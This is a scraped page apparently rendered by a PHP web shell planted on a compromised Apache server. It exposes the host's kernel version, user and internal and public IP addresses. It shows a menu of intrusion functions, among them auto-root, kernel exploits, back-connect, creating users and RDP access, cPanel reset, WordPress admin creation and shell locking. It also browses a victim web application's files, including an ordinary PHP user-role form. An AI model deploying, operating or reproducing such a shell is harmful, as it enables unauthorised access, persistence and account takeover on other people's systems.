Linux 0193-eed-moe-app01 5.15.0-46-generic #49-Ubuntu SMP Thu Aug 4 18:03:25 UTC 2022 x86_64
Apache/2.4.52 (Ubuntu)
: 172.16.229.234 | : 18.216.234.191
Cant Read [ /etc/named.conf ]
8.1.2-1ubuntu2.18
www-data
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
var /
www /
html /
eedpims /
userrole /
[ HOME SHELL ]
Name
Size
Permission
Action
role_user.php
3.46
KB
-rw-r--r--
userrole.php
2.63
KB
-rw-r--r--
userrole_editor.php
1.62
KB
-rw-r--r--
userrole_list.php
4.79
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : userrole_editor.php
<?php include("../homepage/header.php"); include("../homepage/headermenu.php"); ?> <div class="container fullheight"> <div class="row"> <div class="col-md-8 col-md-offset-2"> <br/> <div><font class="headline">নতুন তথ্য যোগ করুন</font></div> <div style="background-color: #ff0000;height: 2px"> </div> <div align="right"><a href="userrole.php?cmd=list">Back</a></font></div> <div class="div-ln"> <br/> <form form name="frm_userrole" method="post" enctype="multipart/form-data" class="form-horizontal"> <div class="form-group"> <label class="col-md-4 control-label">ইউজার রোল</label> <div class="col-md-6"> <input type="text" class="form-control" name="rolename" required value="<?=$rolename?>" required="yes"> </div> </div> <div class="form-group"> <div class="col-md-6 col-md-offset-4"> <input type="hidden" name="cmd" value="add"> <input type="hidden" name="id" value="<?=$Id?>"> <button type="submit" class="btn btn-primary"> <i class="fa fa-btn fa-sign-in"></i>Submit </button> </div> </div> </form> </div> </div> </div> </div> <?php include("../homepage/footer.php"); ?>
Close